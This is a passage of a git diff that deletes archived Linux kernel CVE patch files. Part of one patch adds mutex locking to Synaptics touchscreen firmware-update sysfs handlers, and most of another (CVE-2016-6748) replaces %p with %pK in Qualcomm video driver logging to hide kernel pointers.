-+
-+do_recovery_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -5201,9 +5229,13 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 	int retval;
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
-+
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (fwu->in_ub_mode) {
-@@ -5211,7 +5243,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 				"%s: In microbootloader mode\n",
- 				__func__);
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	//if (!fwu->ext_data_source)
-@@ -5226,7 +5258,7 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 
- 	if ((input != NORMAL) && (input != FORCE)) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto reflash_store_exit;
- 	}
- 
- 	if (input == FORCE)
-@@ -5237,12 +5269,12 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to do reflash\n",
- 				__func__);
--		goto exit;
-+		goto reflash_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+reflash_store_free_exit:
- 	if (fwu->ext_data_source != NULL) {
- 		kfree(fwu->ext_data_source);
- 		fwu->ext_data_source = NULL;
-@@ -5250,6 +5282,9 @@ static ssize_t fwu_sysfs_do_reflash_store(struct device *dev,
- 	fwu->image = NULL;
- 	fwu->force_update = FORCE_UPDATE;
- 	fwu->do_lockdown = DO_LOCKDOWN;
-+
-+reflash_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -5260,14 +5295,17 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
- 	if (fwu->in_ub_mode) {
-@@ -5275,28 +5313,32 @@ static ssize_t fwu_sysfs_write_config_store(struct device *dev,
- 				"%s: In microbootloader mode\n",
- 				__func__);
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_config_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto write_config_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
--
-+	}
- 	retval = fwu_start_write_config();
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to write config\n",
- 				__func__);
--		goto exit;
-+		goto write_config_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+write_config_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
-+
-+write_config_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
-@@ -5320,7 +5362,11 @@ static ssize_t fwu_sysfs_read_config_store(struct device *dev,
- 		return -EINVAL;
- 	}
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = fwu_do_read_config();
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to read config\n",
-@@ -5341,7 +5387,10 @@ static ssize_t fwu_sysfs_config_area_store(struct device *dev,
- 	if (retval)
- 		return retval;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	fwu->config_area = config_area;
-+	mutex_unlock(&fwu_sysfs_mutex);
- 
- 	return count;
- }
-@@ -5352,8 +5401,12 @@ static ssize_t fwu_sysfs_image_name_store(struct device *dev,
- 	int retval;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
- 	retval = secure_memcpy(fwu->image_name, MAX_IMAGE_NAME_LEN,
- 			buf, count, count);
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to copy image file name\n",
-@@ -5375,6 +5428,9 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 	if (retval)
- 		return retval;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	fwu->image_size = size;
- 	fwu->data_pos = 0;
- 
-@@ -5382,6 +5438,8 @@ static ssize_t fwu_sysfs_image_size_store(struct device *dev,
- 		kfree(fwu->ext_data_source);
- 	}
- 	fwu->ext_data_source = kzalloc(fwu->image_size, GFP_KERNEL);
-+	mutex_unlock(&fwu_sysfs_mutex);
-+
- 	if (!fwu->ext_data_source) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to alloc mem for image data\n",
-@@ -5441,14 +5499,17 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 	unsigned int input;
- 	struct synaptics_rmi4_data *rmi4_data = fwu->rmi4_data;
- 
-+	if (!mutex_trylock(&fwu_sysfs_mutex))
-+		return -EBUSY;
-+
- 	if (sscanf(buf, "%u", &input) != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_guest_code_store_exit;
- 	}
- 
- 	if (input != 1) {
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_guest_code_store_exit;
- 	}
- 
- 	if (fwu->in_ub_mode) {
-@@ -5456,28 +5517,32 @@ static ssize_t fwu_sysfs_write_guest_code_store(struct device *dev,
- 				"%s: In microbootloader mode\n",
- 				__func__);
- 		retval = -EINVAL;
--		goto exit;
-+		goto write_guest_code_store_exit;
- 	}
- 
--	if (!fwu->ext_data_source)
--		return -EINVAL;
--	else
-+	if (!fwu->ext_data_source) {
-+		retval = -EINVAL;
-+		goto write_guest_code_store_exit;
-+	} else {
- 		fwu->image = fwu->ext_data_source;
-+	}
- 
- 	retval = fwu_start_write_guest_code();
- 	if (retval < 0) {
- 		dev_err(rmi4_data->pdev->dev.parent,
- 				"%s: Failed to write guest code\n",
- 				__func__);
--		goto exit;
-+		goto write_guest_code_store_free_exit;
- 	}
- 
- 	retval = count;
- 
--exit:
-+write_guest_code_store_free_exit:
- 	kfree(fwu->ext_data_source);
- 	fwu->ext_data_source = NULL;
- 	fwu->image = NULL;
-+write_guest_code_store_exit:
-+	mutex_unlock(&fwu_sysfs_mutex);
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch
deleted file mode 100644
index 8e6449ea..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6748/3.10/0001.patch
+++ /dev/null
@@ -1,2158 +0,0 @@
-From be651d020b122a1ba9410d23ca4ebbe9f5598df6 Mon Sep 17 00:00:00 2001
-From: Sanjay Singh <sisanj@codeaurora.org>
-Date: Wed, 10 Aug 2016 12:40:58 +0530
-Subject: msm: vidc: use %pK instead of %p which respects kptr_restrict sysctl
-
-Hide kernel pointers from unprivileged ussers by using %pK format-
-specifier instead of %p. This respects the kptr_restrict sysctl
-setting which is by default on. So by default %pK will print zeroes
-as address. echo 1 to kptr_restrict to print proper kernel addresses.
-
-CRs-Fixed: 987018
-Change-Id: I4772257a557c6730ecc0624cbc8e5614e893e9fd
-Signed-off-by: Sanjay Singh <sisanj@codeaurora.org>
----
- .../media/platform/msm/vidc/hfi_packetization.c    |   8 +-
- .../media/platform/msm/vidc/hfi_response_handler.c |  48 +++----
- drivers/media/platform/msm/vidc/msm_smem.c         |  20 +--
- drivers/media/platform/msm/vidc/msm_v4l2_vidc.c    |   6 +-
- drivers/media/platform/msm/vidc/msm_vdec.c         |  40 +++---
- drivers/media/platform/msm/vidc/msm_venc.c         |  32 ++---
- drivers/media/platform/msm/vidc/msm_vidc.c         |  36 +++---
- drivers/media/platform/msm/vidc/msm_vidc_common.c  | 138 ++++++++++-----------
- drivers/media/platform/msm/vidc/msm_vidc_dcvs.c    |  14 +--
- drivers/media/platform/msm/vidc/msm_vidc_debug.c   |  18 +--
- drivers/media/platform/msm/vidc/q6_hfi.c           |  22 ++--
- drivers/media/platform/msm/vidc/venus_hfi.c        |  96 +++++++-------
- drivers/media/platform/msm/vidc/vidc_hfi.c         |   4 +-
- drivers/media/platform/msm/vidc/vmem/vmem.c        |   6 +-
- 14 files changed, 244 insertions(+), 244 deletions(-)
-
-diff --git a/drivers/media/platform/msm/vidc/hfi_packetization.c b/drivers/media/platform/msm/vidc/hfi_packetization.c
-index 06ac913..86239e2 100644
---- a/drivers/media/platform/msm/vidc/hfi_packetization.c
-+++ b/drivers/media/platform/msm/vidc/hfi_packetization.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -1402,7 +1402,7 @@ int create_pkt_cmd_session_set_property(
- 			break;
- 		default:
- 			dprintk(VIDC_ERR,
--					"Invalid Rate control setting: 0x%p\n",
-+					"Invalid Rate control setting: 0x%pK\n",
- 					pdata);
- 			break;
- 		}
-@@ -2084,7 +2084,7 @@ int create_pkt_ssr_cmd(enum hal_ssr_trigger_type type,
- 		struct hfi_cmd_sys_test_ssr_packet *pkt)
- {
- 	if (!pkt) {
--		dprintk(VIDC_ERR, "Invalid params, device: %p\n", pkt);
-+		dprintk(VIDC_ERR, "Invalid params, device: %pK\n", pkt);
- 		return -EINVAL;
- 	}
- 	pkt->size = sizeof(struct hfi_cmd_sys_test_ssr_packet);
-@@ -2097,7 +2097,7 @@ int create_pkt_cmd_sys_image_version(
- 		struct hfi_cmd_sys_get_property_packet *pkt)
- {
- 	if (!pkt) {
--		dprintk(VIDC_ERR, "%s invalid param :%p\n", __func__, pkt);
-+		dprintk(VIDC_ERR, "%s invalid param :%pK\n", __func__, pkt);
- 		return -EINVAL;
- 	}
- 	pkt->size = sizeof(struct hfi_cmd_sys_get_property_packet);
-diff --git a/drivers/media/platform/msm/vidc/hfi_response_handler.c b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-index e148f04..c315b6d 100644
---- a/drivers/media/platform/msm/vidc/hfi_response_handler.c
-+++ b/drivers/media/platform/msm/vidc/hfi_response_handler.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -255,7 +255,7 @@ static void hfi_process_event_notify(msm_vidc_callback callback, u32 device_id,
- 		hfi_process_sys_error(callback, device_id);
- 		break;
- 	case HFI_EVENT_SESSION_PROPERTY_CHANGED:
--		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_PROPERTY_CHANGED[%p]\n",
-+		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_PROPERTY_CHANGED[%pK]\n",
- 			session);
- 		break;
- 	}
-@@ -267,24 +267,24 @@ static void hfi_process_event_notify(msm_vidc_callback callback, u32 device_id,
- 
- 	switch (pkt->event_id) {
- 	case HFI_EVENT_SESSION_ERROR:
--		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_ERROR[%p]\n", session);
-+		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_ERROR[%pK]\n", session);
- 		hfi_process_session_error(callback, device_id, session, pkt);
- 		break;
- 	case HFI_EVENT_SESSION_SEQUENCE_CHANGED:
--		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_SEQUENCE_CHANGED[%p]\n",
-+		dprintk(VIDC_INFO, "HFI_EVENT_SESSION_SEQUENCE_CHANGED[%pK]\n",
- 			session);
- 		hfi_process_sess_evt_seq_changed(callback, device_id,
- 				session, pkt);
- 		break;
- 	case HFI_EVENT_RELEASE_BUFFER_REFERENCE:
--		dprintk(VIDC_INFO, "HFI_EVENT_RELEASE_BUFFER_REFERENCE[%p]\n",
-+		dprintk(VIDC_INFO, "HFI_EVENT_RELEASE_BUFFER_REFERENCE[%pK]\n",
- 			session);
- 		hfi_process_evt_release_buffer_ref(callback, device_id,
- 				session, pkt);
- 		break;
- 	default:
- 		dprintk(VIDC_WARN,
--				"hal_process_event_notify: unknown_event_id[%p]\n",
-+				"hal_process_event_notify: unknown_event_id[%pK]\n",
- 				session);
- 		break;
- 	}
-@@ -887,7 +887,7 @@ static enum vidc_status hfi_parse_init_done_properties(
- 		}
- 		default:
- 			dprintk(VIDC_DBG,
--				"%s: default case - data_ptr %p, prop_id 0x%x\n",
-+				"%s: default case - data_ptr %pK, prop_id 0x%x\n",
- 				__func__, data_ptr, prop_id);
- 			break;
- 		}
-@@ -925,7 +925,7 @@ enum vidc_status hfi_process_sys_init_done_prop_read(
- 	data_ptr = (u8 *) &pkt->rg_property_data[0];
- 	num_properties = pkt->num_properties;
- 	dprintk(VIDC_DBG,
--		"%s: data_start %p, num_properties %#x\n",
-+		"%s: data_start %pK, num_properties %#x\n",
- 		__func__, data_ptr, num_properties);
- 
- 	bytes_read = hfi_fill_codec_info(data_ptr, sys_init_done);
-@@ -955,7 +955,7 @@ static void hfi_process_sess_get_prop_profile_level(
- 	dprintk(VIDC_DBG, "Entered %s\n", __func__);
- 	if (!prop) {
- 		dprintk(VIDC_ERR,
--			"hal_process_sess_get_profile_level: bad_prop: %p\n",
-+			"hal_process_sess_get_profile_level: bad_prop: %pK\n",
- 			prop);
- 		return;
- 	}
-@@ -986,7 +986,7 @@ static void hfi_process_sess_get_prop_buf_req(
- 
- 	if (!prop) {
- 		dprintk(VIDC_ERR,
--			"hal_process_sess_get_prop_buf_req: bad_prop: %p\n",
-+			"hal_process_sess_get_prop_buf_req: bad_prop: %pK\n",
- 			prop);
- 		return;
- 	}
-@@ -1105,7 +1105,7 @@ static void hfi_process_session_prop_info(msm_vidc_callback callback,
- 	struct buffer_requirements buff_req;
- 
- 	memset(&buff_req, 0, sizeof(struct buffer_requirements));
--	dprintk(VIDC_DBG, "Received SESSION_PROPERTY_INFO[%p]\n", session);
-+	dprintk(VIDC_DBG, "Received SESSION_PROPERTY_INFO[%pK]\n", session);
- 
- 	if (pkt->size < sizeof(struct hfi_msg_session_property_info_packet)) {
- 		dprintk(VIDC_ERR,
-@@ -1161,7 +1161,7 @@ static void hfi_process_session_init_done(
- 
- 	memset(&session_init_done, 0, sizeof(struct
- 				vidc_hal_session_init_done));
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_INIT_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_INIT_DONE[%pK]\n", session);
- 
- 	if (sizeof(struct hfi_msg_sys_session_init_done_packet)
- 		> pkt->size) {
-@@ -1181,7 +1181,7 @@ static void hfi_process_session_init_done(
- 			pkt, &session_init_done);
- 	} else {
- 		dprintk(VIDC_WARN,
--			"Sess init failed: 0x%p, 0x%p\n",
-+			"Sess init failed: 0x%pK, 0x%pK\n",
- 			session->session_id, session);
- 	}
- 	cmd_done.size = sizeof(struct vidc_hal_session_init_done);
-@@ -1193,7 +1193,7 @@ static void hfi_process_session_load_res_done(msm_vidc_callback callback,
- 		struct hfi_msg_session_load_resources_done_packet *pkt)
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_LOAD_RESOURCES_DONE[%p]\n",
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_LOAD_RESOURCES_DONE[%pK]\n",
- 		session);
- 
- 	if (sizeof(struct hfi_msg_session_load_resources_done_packet) !=
-@@ -1218,7 +1218,7 @@ static void hfi_process_session_flush_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_FLUSH_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_FLUSH_DONE[%pK]\n", session);
- 
- 	if (sizeof(struct hfi_msg_session_flush_done_packet) != pkt->size) {
- 		dprintk(VIDC_ERR,
-@@ -1241,7 +1241,7 @@ static void hfi_process_session_etb_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_data_done data_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_ETB_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_ETB_DONE[%pK]\n", session);
- 
- 	if (!pkt || pkt->size <
- 		sizeof(struct hfi_msg_session_empty_buffer_done_packet)) {
-@@ -1282,7 +1282,7 @@ static void hfi_process_session_ftb_done(msm_vidc_callback callback,
- 		return;
- 	}
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_FTB_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_FTB_DONE[%pK]\n", session);
- 
- 	if (is_decoder == 0) {
- 		struct hfi_msg_session_fill_buffer_done_compressed_packet *pkt =
-@@ -1382,7 +1382,7 @@ static void hfi_process_session_start_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_START_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_START_DONE[%pK]\n", session);
- 
- 	if (!pkt || pkt->size !=
- 		sizeof(struct hfi_msg_session_start_done_packet)) {
-@@ -1405,7 +1405,7 @@ static void hfi_process_session_stop_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_STOP_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_STOP_DONE[%pK]\n", session);
- 
- 	if (!pkt || pkt->size !=
- 		sizeof(struct hfi_msg_session_stop_done_packet)) {
-@@ -1428,7 +1428,7 @@ static void hfi_process_session_rel_res_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_RELEASE_RESOURCES_DONE[%p]\n",
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_RELEASE_RESOURCES_DONE[%pK]\n",
- 		session);
- 
- 	if (!pkt || pkt->size !=
-@@ -1459,7 +1459,7 @@ static void hfi_process_session_rel_buf_done(msm_vidc_callback callback,
- 			pkt ? pkt->size : 0);
- 		return;
- 	}
--	dprintk(VIDC_DBG, "RECEIVED:SESSION_RELEASE_BUFFER_DONE[%p]\n",
-+	dprintk(VIDC_DBG, "RECEIVED:SESSION_RELEASE_BUFFER_DONE[%pK]\n",
- 			session);
- 
- 	cmd_done.device_id = device_id;
-@@ -1481,7 +1481,7 @@ static void hfi_process_session_end_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_END_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_END_DONE[%pK]\n", session);
- 
- 	if (!pkt || pkt->size !=
- 		sizeof(struct hfi_msg_sys_session_end_done_packet)) {
-@@ -1503,7 +1503,7 @@ static void hfi_process_session_abort_done(msm_vidc_callback callback,
- {
- 	struct msm_vidc_cb_cmd_done cmd_done = {0};
- 
--	dprintk(VIDC_DBG, "RECEIVED: SESSION_ABORT_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED: SESSION_ABORT_DONE[%pK]\n", session);
- 
- 	if (!pkt || pkt->size !=
- 		sizeof(struct hfi_msg_sys_session_abort_done_packet)) {
-@@ -1540,7 +1540,7 @@ static void hfi_process_session_get_seq_hdr_done(msm_vidc_callback callback,
- 			__func__);
- 		return;
- 	}
--	dprintk(VIDC_DBG, "RECEIVED:SESSION_GET_SEQ_HDR_DONE[%p]\n", session);
-+	dprintk(VIDC_DBG, "RECEIVED:SESSION_GET_SEQ_HDR_DONE[%pK]\n", session);
- 
- 	data_done.device_id = device_id;
- 	data_done.size = sizeof(struct msm_vidc_cb_data_done);
-diff --git a/drivers/media/platform/msm/vidc/msm_smem.c b/drivers/media/platform/msm/vidc/msm_smem.c
-index 47d3ca5..8ab44a1 100644
---- a/drivers/media/platform/msm/vidc/msm_smem.c
-+++ b/drivers/media/platform/msm/vidc/msm_smem.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -34,7 +34,7 @@ static int get_device_address(struct smem_client *smem_client,
- 	struct ion_client *clnt = NULL;
- 
- 	if (!iova || !buffer_size || !hndl || !smem_client) {
--		dprintk(VIDC_ERR, "Invalid params: %p, %p, %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK, %pK, %pK, %pK\n",
- 				smem_client, hndl, iova, buffer_size);
- 		return -EINVAL;
- 	}
-@@ -86,7 +86,7 @@ static void put_device_address(struct smem_client *smem_client,
- 	struct ion_client *clnt = NULL;
- 
- 	if (!hndl || !smem_client) {
--		dprintk(VIDC_WARN, "Invalid params: %p, %p\n",
-+		dprintk(VIDC_WARN, "Invalid params: %pK, %pK\n",
- 				smem_client, hndl);
- 		return;
- 	}
-@@ -120,7 +120,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
- 
- 	hndl = ion_import_dma_buf(client->clnt, fd);
- 	if (IS_ERR_OR_NULL(hndl)) {
--		dprintk(VIDC_ERR, "Failed to get handle: %p, %d, %d, %p\n",
-+		dprintk(VIDC_ERR, "Failed to get handle: %pK, %d, %d, %pK\n",
- 				client, fd, offset, hndl);
- 		rc = -ENOMEM;
- 		goto fail_import_fd;
-@@ -153,7 +153,7 @@ static int ion_user_to_kernel(struct smem_client *client, int fd, u32 offset,
- 		goto fail_device_address;
- 	}
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = 0x%p, fd = %d, device_addr = 0x%pa, size = %zx, kvaddr = 0x%p, buffer_type = %d, flags = 0x%lx\n",
-+		"%s: ion_handle = 0x%pK, fd = %d, device_addr = 0x%pa, size = %zx, kvaddr = 0x%pK, buffer_type = %d, flags = 0x%lx\n",
- 		__func__, mem->smem_priv, fd, &mem->device_addr, mem->size,
- 		mem->kvaddr, mem->buffer_type, mem->flags);
- 	return rc;
-@@ -199,7 +199,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- 	hndl = ion_alloc(client->clnt, size, align, heap_mask, flags);
- 	if (IS_ERR_OR_NULL(hndl)) {
- 		dprintk(VIDC_ERR,
--		"Failed to allocate shared memory = %p, %zx, %d, 0x%x\n",
-+		"Failed to allocate shared memory = %pK, %zx, %d, 0x%x\n",
- 		client, size, align, flags);
- 		rc = -ENOMEM;
- 		goto fail_shared_mem_alloc;
-@@ -237,7 +237,7 @@ static int alloc_ion_mem(struct smem_client *client, size_t size, u32 align,
- 	}
- 	mem->size = size;
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = 0x%p, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%p, buffer_type = 0x%x, flags = 0x%lx\n",
-+		"%s: ion_handle = 0x%pK, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%pK, buffer_type = 0x%x, flags = 0x%lx\n",
- 		__func__, mem->smem_priv, &mem->device_addr,
- 		mem->size, mem->kvaddr,
- 		mem->buffer_type, mem->flags);
-@@ -255,7 +255,7 @@ static void free_ion_mem(struct smem_client *client, struct msm_smem *mem)
- 	int domain, partition, rc;
- 
- 	dprintk(VIDC_DBG,
--		"%s: ion_handle = 0x%p, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%p, buffer_type = 0x%x\n",
-+		"%s: ion_handle = 0x%pK, device_addr = 0x%pa, size = 0x%zx, kvaddr = 0x%pK, buffer_type = 0x%x\n",
- 		__func__, mem->smem_priv, &mem->device_addr,
- 		mem->size, mem->kvaddr, mem->buffer_type);
- 	rc = msm_smem_get_domain_partition((void *)client, mem->flags,
-@@ -333,7 +333,7 @@ static int ion_cache_operations(struct smem_client *client,
- 	int rc = 0;
- 	int msm_cache_ops = 0;
- 	if (!mem || !client) {
--		dprintk(VIDC_ERR, "Invalid params: %p, %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK, %pK\n",
- 			mem, client);
- 		return -EINVAL;
- 	}
-@@ -380,7 +380,7 @@ int msm_smem_cache_operations(void *clt, struct msm_smem *mem,
- 	struct smem_client *client = clt;
- 	int rc = 0;
- 	if (!client) {
--		dprintk(VIDC_ERR, "Invalid params: %p\n",
-+		dprintk(VIDC_ERR, "Invalid params: %pK\n",
- 			client);
- 		return -EINVAL;
- 	}
-diff --git a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-index 309979c..c43c64c 100644
---- a/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-+++ b/drivers/media/platform/msm/vidc/msm_v4l2_vidc.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -307,7 +307,7 @@ static int read_platform_resources(struct msm_vidc_core *core,
- 		struct platform_device *pdev)
- {
- 	if (!core || !pdev) {
--		dprintk(VIDC_ERR, "%s: Invalid params %p %p\n",
-+		dprintk(VIDC_ERR, "%s: Invalid params %pK %pK\n",
- 			__func__, core, pdev);
- 		return -EINVAL;
- 	}
-@@ -696,7 +696,7 @@ static int msm_vidc_remove(struct platform_device *pdev)
- 	struct msm_vidc_core *core;
- 
- 	if (!pdev) {
--		dprintk(VIDC_ERR, "%s invalid input %p", __func__, pdev);
-+		dprintk(VIDC_ERR, "%s invalid input %pK", __func__, pdev);
- 		return -EINVAL;
- 	}
- 	core = pdev->dev.platform_data;
-diff --git a/drivers/media/platform/msm/vidc/msm_vdec.c b/drivers/media/platform/msm/vidc/msm_vdec.c
-index c92d655..dd512ad 100644
---- a/drivers/media/platform/msm/vidc/msm_vdec.c
-+++ b/drivers/media/platform/msm/vidc/msm_vdec.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -835,7 +835,7 @@ int msm_vdec_prepare_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			inst->core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring prepare buf\n",
-+			"Core %pK in bad state, ignoring prepare buf\n",
- 				inst->core);
- 		goto exit;
- 	}
-@@ -914,7 +914,7 @@ int msm_vdec_release_buf(struct msm_vidc_inst *inst,
- 	if (inst->state == MSM_VIDC_CORE_INVALID ||
- 			core->state == VIDC_CORE_INVALID) {
- 		dprintk(VIDC_ERR,
--			"Core %p in bad state, ignoring release output buf\n",
-+			"Core %pK in bad state, ignoring release output buf\n",
- 				core);
- 		goto exit;
- 	}
-@@ -1007,7 +1007,7 @@ int msm_vdec_reqbufs(struct msm_vidc_inst *inst, struct v4l2_requestbuffers *b)
- 	int rc = 0;
- 	if (!inst || !b) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, buffer = %p\n", inst, b);
-+			"Invalid input, inst = %pK, buffer = %pK\n", inst, b);
- 		return -EINVAL;
- 	}
- 	q = msm_comm_get_vb2q(inst, b->type);
-@@ -1038,7 +1038,7 @@ int msm_vdec_g_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 
- 	if (!inst || !f || !inst->core || !inst->core->device) {
- 		dprintk(VIDC_ERR,
--			"Invalid input, inst = %p, format = %p\n", inst, f);
-+			"Invalid input, inst = %pK, format = %pK\n", inst, f);
- 		return -EINVAL;
- 	}
- 
-@@ -1215,7 +1215,7 @@ int msm_vdec_s_parm(struct msm_vidc_inst *inst, struct v4l2_streamparm *a)
- 		fps = fps - 1;
- 
- 	if (inst->prop.fps != fps) {
--		dprintk(VIDC_PROF, "reported fps changed for %p: %d->%d\n",
-+		dprintk(VIDC_PROF, "reported fps changed for %pK: %d->%d\n",
- 				inst, inst->prop.fps, fps);
- 		inst->prop.fps = fps;
- 		msm_dcvs_init_load(inst);
-@@ -1381,7 +1381,7 @@ int msm_vdec_s_fmt(struct msm_vidc_inst *inst, struct v4l2_format *f)
- 
- 	if (!f || !inst || !inst->core || !inst->core->device) {
- 		dprintk(VIDC_ERR,
--			"%s: invalid parameters, format %p, inst %p\n",
-+			"%s: invalid parameters, format %pK, inst %pK\n",
- 			__func__, f, inst);
- 		return -EINVAL;
- 	}
